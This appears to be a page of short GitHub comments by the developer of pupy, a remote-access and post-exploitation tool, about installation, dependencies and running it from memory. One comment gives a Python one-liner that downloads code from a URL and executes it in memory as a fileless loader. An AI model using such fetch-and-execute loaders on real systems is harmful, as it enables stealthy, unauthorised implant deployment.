n1nj4sec

Results 8 comments of n1nj4sec

> Goddamn I hate this docker bullshit. The old pupy without docker was so much better. Feel free not to use it and to use the virtualenv install

are you looking for [pupy](https://github.com/n1nj4sec/pupy) ? ;)

Yes, I think it can be run entirely from memory on linux with very little work, I already planned of dooing a python oneliner loader

done ! here is a poc https://github.com/n1nj4sec/pupy/blob/dev/pupy/oneliner_poc.py All it needs to execute pupy from memory (including the required libraries like rpyc) is : ``` bash python -c 'import urllib;exec urllib.urlopen("http://127.0.0.1:8080/oneliner.py").read()'...

@Bouncingbunny the part written in C is only necessary for loading .pyd or .so libraries from memory. pupy doesn't need that part if you don't use process migration features, but...

I worked on it at some point but eventually gave up because it did not worked as expected ... A lot of products (like the sysinternals) just drop the x64...

Hello, You should be fine there is no dependencies in this project, everything is implemented in ctypes

![not really](https://i.imgflip.com/4wh8jx.jpg)